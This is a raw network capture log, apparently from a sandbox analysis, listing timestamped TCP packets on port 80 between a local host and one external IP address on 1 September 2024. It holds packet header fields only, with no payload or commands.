Sep 1, 2024 18:28:14.174184084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.174225092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.214644909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214674950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214684010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214745045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.214756966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214767933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214776993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214787006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214803934 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.214819908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.214983940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.214994907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215004921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215014935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215023041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215024948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215035915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215046883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215050936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215055943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215068102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215076923 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215097904 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215115070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215488911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215498924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215508938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215524912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.215536118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.215565920 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256247997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256258011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256263971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256402016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256411076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256422997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256433964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256442070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256478071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256522894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256534100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256542921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256552935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256562948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256602049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256637096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256647110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256655931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256680012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256695032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256762981 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256773949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256783962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256805897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256820917 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256944895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256954908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256964922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256974936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256984949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.256987095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.256998062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257009029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257014990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257035971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257057905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257160902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257172108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257203102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257219076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257230997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257241011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257250071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257267952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257298946 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257376909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257388115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257395983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257405043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257415056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257422924 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257426977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257452965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257467031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257477999 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257517099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257606030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257622004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257632017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257642984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257646084 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257652998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257663012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257668018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257672071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257689953 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257707119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257914066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257941008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257951021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257961988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257970095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.257973909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257986069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.257999897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.258023024 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.258048058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.258059025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.258068085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.258079052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.258085012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.258089066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.258114100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.258126020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.262989044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263011932 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263027906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263036966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263037920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263047934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263050079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263075113 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263099909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263142109 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263153076 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263161898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263173103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263181925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263185978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263191938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263202906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263212919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263233900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263245106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263356924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263367891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263377905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263389111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263400078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263403893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263411045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263442993 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263588905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263598919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263629913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263653994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263730049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263741016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263748884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263767958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263787985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263875961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263900995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263911963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263921022 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263921976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263941050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263947010 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263952971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263963938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263971090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.263976097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263987064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.263999939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.264027119 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.298835039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.298897028 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299000978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299010038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299020052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299032927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299037933 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299058914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299069881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299074888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299082041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299084902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299189091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299189091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299189091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299336910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299348116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299359083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299370050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299381018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299418926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.299498081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299510002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299515963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.299549103 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.300651073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.300698996 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.300848961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.300864935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.300893068 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.300909042 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301024914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301034927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301049948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301060915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301062107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301073074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301079988 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301095963 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301121950 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301193953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301203966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301214933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301232100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301251888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301372051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301383972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301393032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301417112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301430941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301552057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301562071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301573038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301584005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301593065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301595926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301611900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301640034 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301728010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301738977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301748991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.301772118 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.301784039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344614029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344630003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344644070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344654083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344666958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344679117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344688892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344690084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344706059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344744921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344755888 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344764948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344777107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344786882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344798088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344808102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344816923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344825983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344841957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344860077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344860077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344860077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344860077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344860077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344861031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344861031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344875097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344885111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344894886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344897985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344906092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344916105 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344923973 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344928980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344939947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344950914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344953060 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344961882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344973087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344973087 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344981909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.344990969 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.344991922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345001936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345009089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345012903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345021009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345025063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345041037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345052004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345053911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345062971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345082045 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345093966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345122099 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345190048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345201015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345210075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345218897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345230103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345231056 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345240116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345249891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345251083 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345261097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345272064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345283031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345285892 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345300913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345303059 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345316887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345320940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345328093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345340014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345344067 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345350027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345360041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345371008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345372915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345381975 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345391989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345408916 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345432043 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345448971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345459938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.345484972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.345510006 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346225023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346267939 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346412897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346422911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346432924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346443892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346451998 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346471071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346472025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346482992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346498966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346501112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346509933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:14.346527100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346551895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:14.346884012 CEST	80	56177	91.202.233.158	192.168.2.4
